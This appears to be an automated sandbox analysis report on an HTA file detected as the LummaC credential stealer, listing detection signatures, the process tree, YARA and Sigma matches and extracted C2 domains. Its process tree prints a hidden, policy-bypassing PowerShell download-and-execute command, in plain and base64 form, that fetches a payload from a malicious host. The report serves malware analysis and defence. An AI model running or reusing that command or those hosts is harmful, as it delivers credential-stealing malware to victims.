Edit tour
Windows
Analysis Report
anrek.mp4.hta
Overview
General Information
| Sample name: | anrek.mp4.hta |
| Analysis ID: | 1584779 |
| MD5: | dbf37b54acb5e3b86a3dc93ec3b7dc24 |
| SHA1: | 65100e3e23406a9f92880e202e4b006fd39f33d6 |
| SHA256: | aa845a8fb4ab38aebe6a16a2a8f80ca4467ac0991d3eef4d8a10bdf97dedb1e9 |
| Tags: | htaLummaStealeruser-lontze7 |
| Infos: |   |
 | |
Detection
LummaC Stealer
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 5784 cmdline: mshta.exe "C:\Users\ user\Deskt op\anrek.m p4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
powershell.exe (PID: 6160 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -enc UwB0A GEAcgB0AC0 AUAByAG8AY wBlAHMAcwA gACIAQwA6A FwAVwBpAG4 AZABvAHcAc wBcAFMAeQB zAFcAbwB3A DYANABcAFc AaQBuAGQAb wB3AHMAUAB vAHcAZQByA FMAaABlAGw AbABcAHYAM QAuADAAXAB wAG8AdwBlA HIAcwBoAGU AbABsAC4AZ QB4AGUAIgA gAC0AQQByA GcAdQBtAGU AbgB0AEwAa QBzAHQAIAA iAC0AdwAgA GgAaQBkAGQ AZQBuACAAL QBlAHAAIAB iAHkAcABhA HMAcwAgAC0 AbgBvAHAAI AAtAEMAbwB tAG0AYQBuA GQAIABgACI AaQBlAHgAI AAoACgATgB lAHcALQBPA GIAagBlAGM AdAAgAFMAe QBzAHQAZQB tAC4ATgBlA HQALgBXAGU AYgBDAGwAa QBlAG4AdAA pAC4ARABvA HcAbgBsAG8 AYQBkAFMAd AByAGkAbgB nACgAJwBoA HQAdABwAHM AOgAvAC8Aa wBsAGkAcAB kAGkAaABlA HEAbwBlAC4 AcwBoAG8Ac AAvAHIAdQB 3AGsAbAAuA HAAbgBnACc AKQApAGAAI gAiACAALQB XAGkAbgBkA G8AdwBTAHQ AeQBsAGUAI ABIAGkAZAB kAGUAbgA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 5632 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2804 cmdline:
"C:\Window s\SysWow64 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden -ep bypass -nop -Com mand "iex ((New-Obje ct System. Net.WebCli ent).Downl oadString( 'https://k lipdiheqoe .shop/ruwk l.png'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 2748 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4244 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
FQCBPDRKWCIGP0ODQG879LFLUZ.exe (PID: 6848 cmdline: "C:\Users\ user\AppDa ta\Local\T emp\FQCBPD RKWCIGP0OD QG879LFLUZ .exe" MD5: C89C55FE25372BFBF8B9264A647C144B) - FQCBPDRKWCIGP0ODQG879LFLUZ.tmp (PID: 1888 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\is-UFG 0L.tmp\FQC BPDRKWCIGP 0ODQG879LF LUZ.tmp" / SL5="$8022 4,7875736, 845824,C:\ Users\user \AppData\L ocal\Temp\ FQCBPDRKWC IGP0ODQG87 9LFLUZ.exe " MD5: F809F51E678B7F2E388F8C969EF902C8) - FQCBPDRKWCIGP0ODQG879LFLUZ.exe (PID: 1852 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\FQCBPD RKWCIGP0OD QG879LFLUZ .exe" /VER YSILENT MD5: C89C55FE25372BFBF8B9264A647C144B) - FQCBPDRKWCIGP0ODQG879LFLUZ.tmp (PID: 6156 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\is-OMT BU.tmp\FQC BPDRKWCIGP 0ODQG879LF LUZ.tmp" / SL5="$D005 A,7875736, 845824,C:\ Users\user \AppData\L ocal\Temp\ FQCBPDRKWC IGP0ODQG87 9LFLUZ.exe " /VERYSIL ENT MD5: F809F51E678B7F2E388F8C969EF902C8)
- cleanup
{"C2 url": ["noisycuttej.shop", "tirepublicerj.shop", "framekgirus.shop", "nearycrepso.shop", "grooveoiy.cyou", "abruptyopsn.shop", "wholersorie.shop", "rabidcowse.shop", "cloudewahsj.shop"], "Build id": "c2CoW0--RIII"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: | ||